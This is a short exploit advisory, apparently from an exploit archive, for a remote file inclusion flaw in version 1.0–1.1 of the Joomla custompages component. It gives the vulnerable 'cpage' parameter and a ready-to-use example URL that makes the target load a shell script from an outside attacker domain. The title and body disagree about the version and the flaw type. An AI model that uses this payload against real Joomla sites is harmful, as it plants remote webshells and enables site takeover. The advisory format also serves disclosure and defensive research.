id: 2765
date: 03/22/2008
title: Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
author: Sniper456
cves: 

=====================================================================
Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
=====================================================================



@ JOOmla Component custompages <= 1.0 Sql Remote file Inclusion


Author:Sniper456

Greetss: My chilean people

Developer: Shawn Sandy

License:Other open source / Free license

Dork: 8=====B !           =)

**Bug:

http://www.target.com/index.php?option=com_custompages&cpage=URL

**Example

http://www.target.com/index.php?option=com_custompages&cpage=http://atackweeb.cl/colocoloshell.txt?



#  0day.today [2023-03-26]  #